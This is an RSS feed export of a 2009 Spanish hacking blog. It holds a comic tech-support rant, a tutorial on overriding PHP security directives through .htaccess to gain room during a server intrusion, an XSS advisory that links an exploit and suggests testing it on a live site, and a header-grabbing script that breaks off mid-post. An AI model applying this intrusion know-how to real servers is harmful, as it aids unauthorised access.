<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2enclosuresfull.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:media="http://search.yahoo.com/mrss/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:creativeCommons="http://backend.userland.com/creativeCommonsRssModule" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0"><channel><title>0V3RL04D 1N TH3 N3T</title><link>http://0verl0ad.blogspot.com/</link><description>Vulnerabilitys &amp;amp; .NET...

&amp;quot;El conocimiento te hace libre... la libertad es la red&amp;quot;</description><language>en</language><managingEditor>camaleon__81@hotmail.com (The X-C3LL)</managingEditor><lastBuildDate>Mon, 09 Nov 2009 00:21:21 PST</lastBuildDate><generator>Blogger</generator><atom:id xmlns:atom="http://www.w3.org/2005/Atom">tag:blogger.com,1999:blog-2806641995089653786</atom:id><openSearch:totalResults xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">52</openSearch:totalResults><openSearch:startIndex xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">1</openSearch:startIndex><openSearch:itemsPerPage xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">25</openSearch:itemsPerPage><media:copyright>Copyright: "Vengador de las Sombras"</media:copyright><media:thumbnail url="http://img247.imageshack.us/img247/2859/vforvendettakw2.jpg" /><media:keywords>Hack,hacking,hackers</media:keywords><media:category scheme="http://www.itunes.com/dtds/podcast-1.0.dtd">Technology</media:category><itunes:owner><itunes:email>lessiem@arnet.com.ar</itunes:email><itunes:name>Copyright: "Vengador de las Sombras"</itunes:name></itunes:owner><itunes:author>Copyright: "Vengador de las Sombras"</itunes:author><itunes:explicit>no</itunes:explicit><itunes:image href="http://img247.imageshack.us/img247/2859/vforvendettakw2.jpg" /><itunes:keywords>Hack,hacking,hackers</itunes:keywords><itunes:subtitle>Vengador de las Sombras 's Podcast</itunes:subtitle><itunes:summary>Hacking en su maxima expresion</itunes:summary><itunes:category text="Technology" /><creativeCommons:license>http://creativecommons.org/licenses/by/3.0/</creativeCommons:license><image><link>http://creativecommons.org/licenses/by/3.0/</link><url>http://creativecommons.org/images/public/somerights20.gif</url><title>Some Rights Reserved</title></image><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" href="http://feeds.feedburner.com/0v3rl04d1nTh3N3t" type="application/rss+xml" /><feedburner:emailServiceId>0v3rl04d1nTh3N3t</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com" /><item><title>En telefónica sobran inútiles.</title><link>http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~3/MDH2KP9Bq2s/en-telefonica-sobran-inutiles.html</link><category>Anecdotario</category><author>lessiem@arnet.com.ar (Copyright: "Vengador de las Sombras")</author><pubDate>Thu, 09 Jul 2009 10:00:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2806641995089653786.post-4394987594006226243</guid><description>Saludos a todos!&lt;br /&gt;&lt;br /&gt;  Pues sí, esto es bien sabido por todos. ¿Quien no ha llamado nunca a Telefónica para  que le brinden soporte técnico? ¿Y a cuantos os ha ido bien?. Yo todavía no conozco a ninguno...&lt;br /&gt;&lt;br /&gt;  Como podeis deducir, he llamado hoy a telefónica. Aquí, en mi barriada, somos el culo del mundo. No llega ADSL, ni banda ancha, ni siquiera podemos contratar 1MB. Para la infraestructura existente, únicamente podemos trabajar con banda estrecha. Y es que hasta hace bien poco no existía línea telefónica, los teléfonos funcionaban con antenas... &lt;br /&gt;&lt;br /&gt;  Bien, como iba diciendo, mi conexión es a través de acceso telefónico por un modem, ¡Que chupiguay!. En los últimos días no podía conectarme a internet, me salían errores 678, de que el equipo remoto no respondía. A mi y a todo el pueblo en general. Tras media hora dando a "Reintentar conexion", acabas por conectarte, supongo que por aburrimiento. Pues bien, hoy me he tirado una hora y cuarto y nanai de la china... Así que, oh que grave error por mi parte, decidí llamar a Telefónica para me informaran de qué pasaba y cómo solucionarlo.&lt;br /&gt;&lt;br /&gt;Así que llamé al teléfono del demonio, el 1004. Me contesta una máquina -que era muy amable, por cierto- pidiéndome mi número de teléfono fijo y preguntando con mi problema. Le digo mi problema y me manda al teléfono 902 357 000. Así que llamé a ese número:&lt;br /&gt;&lt;br /&gt;-Bienvenido al servicio de soporte técnico para ADSL e Imagenio. Para poder localizarle, introduzca su número.&lt;br /&gt;-950 XXX XXX&lt;br /&gt;(continúa hablando, dando publicidad de 11822 y opciones varias...)&lt;br /&gt;-Hola caballerito, le atiende NombreMuyRápido, ¿En qué podemos ayudarle?&lt;br /&gt;-Sí, buenas... estoy tratando de conectarme a internet y me salta un error...&lt;br /&gt;(me interrumpe rápidamente)&lt;br /&gt;-¿Que tipo de error? 800 y pic, 700 y pico...?&lt;br /&gt;-Error 678...&lt;br /&gt;-Anjá caballerito, ¿Podía darme su número de teléfono y nombre para verificar?&lt;br /&gt;-Faltaría más, 950 XXX XXX, mi nombre es X-C3LL Father (el de mi viejo).&lt;br /&gt;-Ok.. ahorita mismo verifico y continuamos, aguarde un momento.&lt;br /&gt;-Ok...&lt;br /&gt;&lt;br /&gt;En este instante ya me da mala espina... siento algo tenebroso... me ponen música... pero no música cualquiera no... ¡¡REGUETON!!. Me cagüenDiosYenTodosLosSantos...&lt;br /&gt;-Disculpe caballerito, pero ya hemos verificado sus datos. ¿Usted tiene contratada una línea de banda estrecha?&lt;br /&gt;-Sí así es&lt;br /&gt;-Pues discupe usted, caballerito, pero es que aquí sólamente damos soporte a ADSL y a imagino, no podemos ayudarlo.&lt;br /&gt;-Anjá... es que llamé al 1004 y me dieron este número....&lt;br /&gt;-Caballerito, llame al 1002 que es el número de averías allí podrán ayudarlo.&lt;br /&gt;-Hostias... esto va por mal camino...&lt;br /&gt;-¿Decía, caballerito?&lt;br /&gt;-Nada nada... cosas mías, pues muchas gracias llamaré a ver que me dicen por ahí.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; Sí es la maldición de cualquier teleoperadora... las redirecciones de teléfono... de esto no puede salir nada bueno... Marquemos 1002... Me salta la maquinita con lo mismo, introduzca el número etc... omitamos esto y vayamos al "Operador".&lt;br /&gt;&lt;br /&gt;-Buenas, le atiende NombreMásRápidoAúnqueElAnterior, ¿Qué podemos hacer por usted?&lt;br /&gt;-Si mire... le llamo porque no puedo conectarme a internet...&lt;br /&gt;-Ah disculpe, ¿Podría darme su número de teléfono?&lt;br /&gt;-Por supuesto, 950 XXX XXX...&lt;br /&gt;-Aguarde unos instantes, que ahorita mismo los verifico.&lt;br /&gt;(Joder con las verificaciones de los huevos....)&lt;br /&gt;-¿Su nombre es X-C3LL Father ?&lt;br /&gt;-El mismo que viste y calza //tomémoslo con humor porque si no...&lt;br /&gt;-¿Decía?&lt;br /&gt;-Digo que sí, que soy yo.&lt;br /&gt;-Veo que tiene contratado el Düo de internet + llamada...  y respectito a internet usted tiene puesto banda estrecha. ¿Cierto?&lt;br /&gt;-Sí...&lt;br /&gt;-¿Y no ha pensado cambiarse al ADSL?&lt;br /&gt;-Me ha leido el pensamiento.&lt;br /&gt;-¿Y porqué no lo hace?&lt;br /&gt;-Según telefónica, no se puede.&lt;br /&gt;-¿En serio? voy a verificarlo, ahorita mismo vuelvo.&lt;br /&gt;&lt;br /&gt;Nos han jodido con las esperas.... nos van a sacar hasta el hígado. Musiquita de los huevos, pero bueno La Cabalgata de las Walkirias esta vez... Me gusta mucho... además me inspira...&lt;br /&gt;-Señor sigue ahí?&lt;br /&gt;-Sí aquí estoy esperando sus verificaciones&lt;br /&gt;-Sí, le decía que efectivamente usted no puede contratar ADSL &lt;br /&gt;- ¿En serio? No lo sabía, gracias por informarme..&lt;br /&gt;-Para eso estamos señor. ¿Decía que su problema era que no podía conectarse a internet, cierto?&lt;br /&gt;-Sí... eso dije al inicio.&lt;br /&gt;-Pues lo siento, pero este número de atención es únicamente para soporte de teléfono, para internet es el número 902 357 000. Llame y allí le ayudaran....&lt;br /&gt;-Ya llamé ahí, y me dieron este número&lt;br /&gt;- ¿En serio? Voy a verificarlo ahorita mismo...&lt;br /&gt;&lt;br /&gt;Si ya lo sabía yo... quien me mandaría llamar a telefónica... si es que nunca escarmiento... la flauta mágica suena ahora...&lt;br /&gt;&lt;br /&gt;-Pues es cierto, señor. Haga lo siguiente, llame de nuevo y espere a que termine la locucioncita, y despues el experto de banda estrecha de telefónica le atenderá.&lt;br /&gt;- Si atenderme no lo dudo... ¿Pero me va a ayudar?&lt;br /&gt;- Disculpe señor no le entiendo.&lt;br /&gt;- Nada nada... &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno, volvemos a estar donde antes. Esperemos que el Sr. Experto en Banda Estrecha de Telefónica me pueda ayudar...&lt;br /&gt;&lt;br /&gt;(máquina automática)&lt;br /&gt;-Buenas, le atiende NombreFalso, ¿En qué le puedo ayudar?&lt;br /&gt;- Sí buenas... trato de conectarme a internet y me salta un error...&lt;br /&gt;-Anjá.. entiendo... Dele dos clicks izquierdos a su conexión por defecto.&lt;br /&gt;- No está mal configurada si es lo que piensa...&lt;br /&gt;- Disculpe, pero yo aquí soy el experto.&lt;br /&gt;&lt;br /&gt; Nos han jodido. Nos han jodido bien, Madariagas. Que vamos de "yo trabajo en esto y SÉ MAS QUE USTED". Bueno, bailemos a su son...&lt;br /&gt;&lt;br /&gt;-Venga mister, ya lo tengo abierto, ¿QUe hago ahora?&lt;br /&gt;-¿Tiene puesto de usuario Telefonicanet@telefonicanet?&lt;br /&gt;-Po si.&lt;br /&gt;-¿Y de número de teléfono 908200025 ?&lt;br /&gt;-Po si.&lt;br /&gt;-Clicke en propiedades.&lt;br /&gt;-Hecho mister.&lt;br /&gt;-Ahora usted verá una ventana con muchas pestañas...&lt;br /&gt;- La veo la veo.&lt;br /&gt;- En general, ¿Qué numero aparece?&lt;br /&gt;- 908200025&lt;br /&gt;- Ah.. pues eso está bien. Qué raro. ¿Y tiene la seguridad en "Típica"?&lt;br /&gt;- Efectivamente, es usted un lince.&lt;br /&gt;- Gracias... Vaya a funciones de red, clique dos veces en Protocolo Internet... Y verá usted las DNS.&lt;br /&gt;- Efectivamente mister.&lt;br /&gt;- ¿Podría decirme que números pone?&lt;br /&gt;- Pues de preferente esta y de alternativa esta otra...&lt;br /&gt;-Anjá pues aquí está el problema.&lt;br /&gt;- No se ofenda... no dudo de sus poderes telepáticos pero... ¿Cuando le he dicho mi problema?&lt;br /&gt;- Vamos a ver Chico, yo aquí soy el experto, y los DNS tienen qeu ser estos... Seguro qeu ha sido algún virus informático el que te ha trastocado eso....&lt;br /&gt;- A sí... el virus RGB090...&lt;br /&gt;-¿Como dice?&lt;br /&gt;- Nada cosas mías. Que digo yo, que no sé nada de cacharros de estos, que los DNS los cambié porque los que me proporcionaba por defecto Telefónica me bloqueaba algunas webs...&lt;br /&gt;-Imposible.&lt;br /&gt;-Posible, mire mister, que se lo juro por Snoopy y todos sus amigos.&lt;br /&gt;-Bueno, ponga estos DNS, reinicie y digame si puede conectarse...&lt;br /&gt;- Allá voy señor experto...&lt;br /&gt;(reinicio el ordenata...)&lt;br /&gt;-Mister, que esto sigue sin chutar.&lt;br /&gt;-Imposible&lt;br /&gt;-Posible.&lt;br /&gt;-Que le digo que es imposible, que ya tienes bien los DNS.&lt;br /&gt;-Un pequeño inciso, mister.&lt;br /&gt;- Diga.&lt;br /&gt;- Que digo.. que el problema es general a todo el pueblo.. que digo yo que porque la configuración de mis DNS sea diferente a la default, no influiría en el resto de personal... ¿no?&lt;br /&gt;- Pues sí que influye, no vaya uste de listo, que aquí soy yo el esperto.&lt;br /&gt;&lt;br /&gt;Venga, perico al torno. Que tenemos al Dr. Jaimito, Doctorado en Banda Estrecha por la universidad de Yale... &lt;br /&gt;-Pues mire usted, que yo de esto de la informática no tengo ni idea, pero que creo qeu se equivoca. Y por cierto, para poder resolver mi problema no debería saber primero cual es ?&lt;br /&gt;- Vengaaaaaaaaaaaaaaaaaaaaaaa que ya le he dicho que su problema era el de los DNS.&lt;br /&gt;- Y dale perico al torno.&lt;br /&gt;- ¿Como dice?&lt;br /&gt;- Que parece que han hecho una escursión los de la asociación de síndrome de Down y se a perdido uno dentro de la oficina de telefónica...&lt;br /&gt;- A ver borde, ¿Cual es su dichoso problema? //con voz de MUCHO RITINTIN.&lt;br /&gt;- Que cuando trato de conectarme, cuando está marcando, me salta un error diciendome que el equipo remoto no responde.&lt;br /&gt;-Imposible.&lt;br /&gt;-Posible.&lt;br /&gt;- Que le digo yo a usted qeu eso es imposible.&lt;br /&gt;- Y yo a usted que es eso lo que me pasa.&lt;br /&gt;- Pues si ese es su problema, cuando haya reiniciado y haya puesto los DNS que le dicho todo le funcionará..&lt;br /&gt;- Y dale pesado. &lt;br /&gt;- Que le digo a usted qeu son los DNS, y probablemente el virus ese RGB090 esté por tod el pueblo y es el responsable.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Aquí me parto el culo. Así exploto, BOOM, carcajadas hasta saltar las lágrimas. Puto virus RGB090 JAJAJAJAJA. Es que no me podía contener la risa.&lt;br /&gt;&lt;br /&gt;-Un momento, esperese.&lt;br /&gt;- ¿A qué?&lt;br /&gt;- A que implosiones criaturica.&lt;br /&gt;- ¿mm...?&lt;br /&gt;-Nada, una pregunta, ¿Podrías pasarme con alguien qeu sepa algo ?&lt;br /&gt;-Yo soy el experto qeu se te ha asignado..&lt;br /&gt;- Pues si así es el experto.... no quiero saber como son el resto.&lt;br /&gt;Clic.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Pues espero una hora más... y mágicamente me ha funcionado, eso sí, tratando de entrar veinteminutos enteros.. Y es que la verdad... en telefónica sobran inútiles.&lt;br /&gt;&lt;br /&gt;Pôr cierto, espero qeu vuestros antivirus se protejan contra el virus RGB090...&lt;br /&gt;&lt;br /&gt;Byt3z!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2806641995089653786-4394987594006226243?l=0verl0ad.blogspot.com'/&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?a=MDH2KP9Bq2s:30bjQtdmUMw:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/0v3rl04d1nTh3N3t/~4/MDH2KP9Bq2s" height="1" width="1"/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2009-07-11T20:06:13.317+02:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">18</thr:total><feedburner:origLink>http://0verl0ad.blogspot.com/2009/07/en-telefonica-sobran-inutiles.html</feedburner:origLink></item><item><title>Redifiniendo directivas PHP: .htaccess</title><link>http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~3/fz_2A_ZsUZE/redifiniendo-directivas-php-htaccess.html</link><category>Técnicas</category><category>.Htacces</category><category>Rootear</category><author>lessiem@arnet.com.ar (Copyright: "Vengador de las Sombras")</author><pubDate>Tue, 30 Jun 2009 14:41:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2806641995089653786.post-1207770875991598387</guid><description>&lt;style&gt;code{ color:lima;}&lt;/style&gt;Saludos!!&lt;br /&gt;&lt;br /&gt;  Bueeeeeeeeno, hace mucho tiempo que no me podía pasar por el blog. El caso es que estuve con los exámenes y demas parafernália universitarias que paso de comentar. Ahora mismo he vuelto a mi rutina noctámbula delante del ordenador, con una línea magnífica de 24kbps. Por suerte esta situación "precaria" en cuanto a internet sólo durará hasta Septiembre, cuando vuelva al mundo normal AKA Salamanca.&lt;br /&gt;&lt;br /&gt;   Pero bueno, veo que mis compañeros de aventuras en el blog han continuado posteando para que esto no muriera, tarea muy loable. Hoy vengo con la típica energía y entusiasmo que da el iniciar las vacaciones, así que vamos a aprovecharla para hablar de un tema interesante que ya se tocó muy por encima en el post sobre &lt;a href="http://0verl0ad.blogspot.com/search/label/Rootear"&gt; servidores&lt;/a&gt;: modificar directivas para tener más "margen de movimiento".&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;   Para empezar, debemos de comprender que el comportamiento de los scripts PHP que corremos en un servidor están basados en una configuración preestablecida, indicada en el archivo &lt;b&gt;php.ini&lt;/b&gt;. Este archivo contiene lo que a partir de ahora denominaremos como &lt;b&gt;directivas&lt;/b&gt;, que son las instrucciones que marcarán las pautas de comportamiento de PHP, incluyendo limitaciones (que básicamente es la parte que a nosotros nos interesa). Estas directivas están compuestas por una clave y un valor para dicha clave.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;   Las directivas que más nos van a ir interesando (por que tal vez nos puedan tocar un tanto las narices) van a ser safe_mode, Magic_Quotes, open_basedir, disable_functions... &lt;br /&gt;&lt;br /&gt;   &lt;b&gt;Safe_Mode&lt;/b&gt;, como su propio nombre indica, activa el "Modo Seguro" de PHP, bloqueando ciertas funciones. Sus posibles valores son On y Off. Despues tenemos &lt;b&gt;magic_quotes_[gpc/runtime/sybase]&lt;/b&gt;, directiva desaconsejada por la mayoría de webmaster, (aunque a la hora de las SQLi es un impedimento desalentador en muchos casos) y básicamente funciona añadiendo una barra invertida (o una comilla simple) a a los caracteres /, ','' y NULL. De esta forma se pretende impedir las inyecciones...  Al igual que safe_mode, sus valores son On y OFF.&lt;br /&gt;&lt;br /&gt;  Por otro lado tenemos &lt;b&gt;Open_basedir&lt;/b&gt;, cuya utilidad es determinar un área de trabajo de PHP, e impedir al ejecución de funciones en puntos más altos del árbol de directorios (más adelante lo explico de forma sencilla). Por último, explicar una de las directivas más restrictivas de cara a una intrusión: &lt;b&gt;disable_functions&lt;/b&gt;. Esta directiva se encarga de inhabilitar aquellas funciones que le indiquemos. Hay que aclarar que presenta independencia con respecto a Safe_Mode.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  Todas estas directivas suelen emplearse en servidores de hosting que emplean para diferentes webs un mismo servidor. Para impedir que los usuarios intervengan (de forma maliciosa o por error) en el espacio de otros, ya sea en los archivos, configuraciones, directorios, etc. Por ejemplo, mediante open_basedir, podemos impedir que desde el espacio empleado por el usuario A pueda ejecutar algún script/programa que pueda afectar a un usuario B. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;   Vale, sé que esta introducción es un tanto básica y que se conoce, pero así espero que la gente pueda comprender todo desde 0. Así que continuemos. Estas directivas pueden ser modificadas desde diferentes puntos, siendo éste uno de los objetivos primoridales cuando obtenemos acceso a un servidor, puesto que lo primero es poder tener cierto margen de maniobrabilidad para poder avanzar en nuestra intrusión. Pero claro, no todas las directivas pueden ser modificable de "tantas formas". Existe una pequeña clasificación de las directivas.&lt;br /&gt;&lt;br /&gt;  La modificabilidad de las directivas viene definida por las constantes &lt;b&gt;PHP_INI_USER&lt;/b&gt;,&lt;b&gt;PHP_INI_PERDIR&lt;/b&gt; , &lt;b&gt;PHP_INI_SYSTEM&lt;/b&gt; y &lt;b&gt;PHP_INI_ALL&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;  Bien, aquellas directivas PHP_INI_USER, pueden ser modificadas desde un script por parte del usuario (usando la función &lt;b&gt;ini_set()&lt;/b&gt;, por ejemplo); PHP_INI_PERDIR desde .htaccess, httpd.conf y desde el propio php.ini; PHP_INI_SYSTEM desde php.ini o httpd.conf; PHP_INI_ALL desde cualquier lugar. Para conocer a qué categoría pertenecen las directivas, &lt;a href="http://www.php-es.com/ini.html"&gt;clickad aquí (PHP-ES.COM)&lt;/a&gt;. Existe otro tipo de directivas, entre las que se encuentra disable_functions, que únicamente son modfiicable a través de php.ini.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;   Algunas directivas pueden ser modificables a través del archivo .htaccess. Para ello, tenemos dos opciones y son a través de &lt;b&gt;php_flag&lt;/b&gt; y &lt;b&gt;php_value&lt;/b&gt;. Si creamos un archivo .htaccess en el servidor en el que estamos, podemos redefinir aquellas directivas cuyos posibles valores sean on u off usando php_flag:&lt;br /&gt;&lt;br /&gt;&lt;code&gt;php_flag magic_quotes_gpc on&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;   Y cuando existe polivalencia para la instrucción, empleamos php_value. Si lo que deseamos es eliminar algún valor, utilizaremos  &lt;b&gt;none&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;  El hecho de poder crear un .htaccess que redifina las directivas (principalmente las de seguridad) es algo muy sencillo de hacer y que nos puede ayudar en muchas ocasiones. &lt;br /&gt;&lt;br /&gt;   La configuración, viene dada por el archivo php.ini (como ya dijimos en un principio), y por los archivos .htaccess (y httpd.conf). Si tenemos un .htacces redifiniendo directivas en la raíz, a la hora de decidir cuál se van a emplear ( si que aparecen indicadas en php.ini o por el contrario las que aparecen en .htacces), la balanza se va a del lado del .htaccess. Además, en esto de las preferencias, interviene un detalle crucial y que es, en síntesis, aquél por el cual podemos emplear este método a modo de "bypass" de restricciones, y es la heredabilidad.&lt;br /&gt;&lt;br /&gt;  Cuando hablamos de la heredabilidad de .htacces, hacemos referencia a que si hay un archivo de este tipo en un directorio, y existe otro en la raíz, las indicaciones presente en el archivo existente en el propio directorio donde se está ejecutando el script PHP seran aquellas que se tengan en cuenta. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;    Espero que este artículo se entienda más o menos (si existe algún error comunicadmelo). La verdad es que .htaccess es una herramienta muy útil, y que se le está dando bastante uso: desde asociar scripts PHP a extensiones tipo jpeg, gif, etc, hasta bypassear mod_security.&lt;br /&gt;&lt;br /&gt;Byt3z&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2806641995089653786-1207770875991598387?l=0verl0ad.blogspot.com'/&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?a=fz_2A_ZsUZE:4fVjv1V9Z7U:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/0v3rl04d1nTh3N3t/~4/fz_2A_ZsUZE" height="1" width="1"/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2009-07-01T01:23:03.171+02:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://0verl0ad.blogspot.com/2009/06/redifiniendo-directivas-php-htaccess.html</feedburner:origLink></item><item><title>Blog System v1.5 - XSS por post</title><link>http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~3/wph1ytp8yaY/blog-system-v15-xss-por-post.html</link><category>advisories</category><category>XSS</category><author>lessiem@arnet.com.ar (Copyright: "Vengador de las Sombras")</author><pubDate>Tue, 09 Jun 2009 13:39:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2806641995089653786.post-7802213518504171212</guid><description>Name:    Blog System v1.5&lt;br /&gt;Vuln:    XSS&lt;br /&gt;Web:     http://www.netartmedia.net/blogsystem/&lt;br /&gt;Dork:    WTF!&lt;br /&gt;Author:  &gt;&gt; s E t H &lt;&lt;&lt;br /&gt;My blog: http://0verl0ad.blogspot.com/&lt;br /&gt;Email: seth /A\ el-hacker /D\ org&lt;br /&gt;&lt;br /&gt;&lt;a href="http://seth.oxyhost.com/descargas/exploit_blog_system_1.5_xss.txt"&gt;Ver exploit&lt;/a&gt;&lt;br /&gt;Para probar, pueden apuntar el form a http://www.blog23.com/index.php&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2806641995089653786-7802213518504171212?l=0verl0ad.blogspot.com'/&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?a=wph1ytp8yaY:rmCZSc0tZeI:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/0v3rl04d1nTh3N3t?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/0v3rl04d1nTh3N3t/~4/wph1ytp8yaY" height="1" width="1"/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2009-06-09T22:50:05.776+02:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://0verl0ad.blogspot.com/2009/06/blog-system-v15-xss-por-post.html</feedburner:origLink></item><item><title>ServerInfo 0.1</title><link>http://feedproxy.google.com/~r/0v3rl04d1nTh3N3t/~3/jmthyOaKmPQ/serverinfo-01.html</link><category>HTTP</category><category>Cabeceras</category><category>Bash</category><author>lessiem@arnet.com.ar (Copyright: "Vengador de las Sombras")</author><pubDate>Thu, 04 Jun 2009 12:29:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2806641995089653786.post-3442741119672702929</guid><description>Es un poco molesto estar conectando con netcat y mandando heads y options cada vez que queres ver los headers de un servidor web, asi que hice este script muy sencillo que te muestra esa información.&lt;br /&gt;Pueden bajarlo de &lt;a href="http://seth.oxyhost.com/descargas/sinfo.sh"&gt;acá&lt;/a&gt; y &lt;a href="http://www.mediafire.com/?sharekey=c289372fb0298f3407258ee67c679e4a779d30a7ab1e1f75c95965eaa7bc68bc"&gt;acá&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;una demostracion de lo que hace y como se usa:&lt;br /&gt;&lt;pre class="bbcode" style="overflow: auto;"&gt;seth@debian:~$ chmod +x sinfo.sh&lt;br /&gt;seth@debian:~$ ./sinfo.sh microsoft.com OPTIONS&lt;br /&gt;********************************&lt;br /&gt;* ServerInfo 0.1               *&lt;br /&gt;* http://0verl0ad.blogspot.com *&lt;br /&gt;* seth /A\ el-hacker.org       *&lt;br /&gt;********************************&lt;br /&gt;Uso: ./sinfo.sh host [GET|HEAD|OPTIONS]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Allow: OPTIONS, TRACE, GET, HEAD&lt;br /&gt;Server: Microsoft-IIS/6.0&lt;br /&gt;Public: OPTIONS, TRACE, GET, HEAD, POST&lt;br /&gt;X-Powered-By: ASP.NET&lt;br /&gt;X-UA-Compatible: IE=EmulateIE7&lt;br /&gt;Date: Wed, 03 Jun 2009 23:18:58 GMT&lt;br /&gt;seth@debian:~$ ./sinfo.sh www.google.com.ar HEAD&lt;br /&gt;********************************&lt;br /&gt;* ServerInfo 0.1               *&lt;br /&gt;* http://0verl0ad.blogspot.com *&lt;br /&gt;* seth /A\ el-hacker.org       *&lt;br /&gt;********************************&lt;br /&gt;Uso: ./sinfo.sh host [GET|HEAD|OPTIONS]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Date: Wed, 03 Jun 2009 23:19:05 GMT&lt;br /&gt;Server: gws&lt;br /&gt;seth@debian:~$ ./sinfo.sh foro.undersecurity.net GET&lt;br /&gt;********************************&lt;br /&gt;* ServerInfo 0.1               *&lt;br /&gt;* http://0verl0ad.blogspot.com *&lt;br /&gt;* seth /A\ el-hacker.org       *&lt;br /&gt;********************************&lt;br /&gt;Uso: ./sinfo.sh host [GET|HEAD|OPTIONS]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Date: Wed, 03 Jun 2009 23:19:17 GMT&lt;br /&gt;Server: Apache/1.3.37 (Unix) mod_throttle/3.1.2 FrontPage/5.0.2.2635 mod_psoft_traffic/0.2 mod_ssl/2.8.28 OpenSSL/0.9.8b&lt;br /&gt;X-Powered-By: PHP/5.2.6&lt;br /&gt;seth@debian:~$ ./sinfo.sh foro.undersecurity.net OPTIONS&lt;br /&gt;********************************&lt;br /&gt;* ServerInfo 0.1               *&lt;br /&gt;* http://0verl0ad.blogspot.com *&lt;br /&gt;* seth /A\ el-hacker.org       *&lt;br /&gt;********************************&lt;br /&gt;Uso: ./sinfo.sh host [GET|HEAD|OPTIONS]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Date: Wed, 03 Jun 2009 23:19:27 GMT&lt;br /&gt;Server: Apache/1.3.37 (Unix) mod_throttle/3.1.2 FrontPage/5.0.2.2635 mod_psoft_traffic/0.2 mod_ssl/2.8.28 OpenSSL/0.9.8b&lt;br /&gt;Location: http://www.google.com/search?q=Como%20puedo%20ser%201337%20h4x0r?!?!!1&lt;br /&gt;seth@debian:~$ ./sinfo.sh foro.portalhacker.net OPTIONS&lt;br /&gt;********************************&lt;br /&gt;* ServerInfo 0.1               *&lt;br /&gt;* http://0verl0ad.blogspot.com *&lt;br /&gt;* seth /A\ el-hacker.org       *&lt;br /&gt;********************************&lt;br /&gt;Uso: ./sinfo.sh host [GET|HEAD|OPTIONS]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Date: Wed, 03 Jun 2009 23:19:47 GMT&lt;br /&gt;Server: Apache/1.3.41 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8b&lt;br /&gt;Allow: GET, HEAD, OPTIONS, TRACE&lt;br /&gt;seth@debian:~$&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;Lo que hace es mandar una petición http (con 